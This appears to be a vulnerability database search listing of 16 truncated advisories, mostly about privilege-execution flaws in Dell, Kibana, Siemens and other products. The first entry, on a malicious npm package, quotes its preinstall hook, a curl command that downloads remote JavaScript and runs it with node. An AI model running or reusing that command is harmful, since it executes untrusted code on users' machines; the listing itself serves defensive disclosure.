16 matches found
MAL-2026-5645 Malicious code in sn-internal-test (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...
CVE-2026-49095
Kibana Fleet policy management feature is affected by CVE-2026-49095 due to improper input validation (CWE-20). An authenticated user with Fleet management privileges can inject values into a configuration override mechanism, causing Elastic Agents to be issued API keys with elevated Elasticsearc...
CVE-2026-40638
Dell PowerScale InsightIQ, versions 5.0.0 through 6.2.0, contains an execution with unnecessary privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges...
CVE-2026-25908
Dell Alienware Command Center AWCC, versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges...
Execution with Unnecessary Privileges
Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges through the runscript.py and runscript.rb script execution paths in the script runner components. An attacker can read sensitive credentials by running a script that prints the process environment,...
EUVD-2025-203080
Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database.This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1...
Execution with Unnecessary Privileges
Overview Affected versions of this package are vulnerable to Execution with Unnecessary Privileges via the bulk create API with the overwrite action. An attacker can modify existing records by submitting crafted requests with only CREATE privileges. Remediation Upgrade apache-airflow-core to...
CVE-2025-9257 Uniong|WebITR - Arbitrary File Reading through Path Traversal
WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files...
PT-2025-33357 · Dell · Dell Data Lakehouse
Name of the Vulnerable Software and Affected Versions: Dell Data Lakehouse versions prior to 1.5.0.0 Description: Dell Data Lakehouse is susceptible to an Execution with Unnecessary Privileges issue. A local attacker with high privileges could potentially exploit this, resulting in a Denial of...
CVE-2024-10239
CVE-2024-10239 concerns a stack overflow in the firmware image verification of the Supermicro MBD-X12DPG-OA6. The issue arises from an unchecked fat->fsd.max_fld in the image verification path, allowing an administrator-controlled upload of a crafted image to potentially trigger the overflow. ...
CVE-2023-4003
One Identity Password Manager version 5.9.7.1 - An unauthenticated attacker with physical access to a workstation may upgrade privileges to SYSTEM through an unspecified method. CWE-250: Execution with Unnecessary Privileges...
CVE-2023-4662
Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion.This issue affects Saphira Connect: before 9...
Siemens SICAM TOOLBOX II 安全漏洞
SICAM TOOLBOX II is an engineering solution for plants and systems of all sizes. It allows data collection, data modeling, configuration and parameterization. It is used for process information engineering of automation and central control room systems. Siemens SICAM TOOLBOX II has an Execute wit...
NVIDIA DGX 缓冲区错误漏洞
NVIDIA DGX is a high-performance workstation for deep learning applications from NVIDIA. The NVIDIA DGX A100 suffers from a buffer error vulnerability that originates from a boundary error in the SBIOS in SmbiosPei. An attacker could exploit this vulnerability to trigger out-of-bounds writes and...
xArrow SCADA 输入验证错误漏洞
xArrow SCADA is an installer for industrial control products from xArrow in China. An input validation error vulnerability exists in xArrow SCADA version 7.2 and prior versions, which arises from allowing unauthenticated registry entries to run with application-level privileges...
Sun Java Web Start Splashscreen GIF Decoding Buffer Overflow - Improved Performance (CVE-2008-2086)
The Sun Java Web Start is a component of the Java 2 Runtime Environment JRE. It allows for the network deployment of Java applications. This component enables stand-alone Java applications to be downloaded from a remote network location and invoked on a target machine. There exists a memory...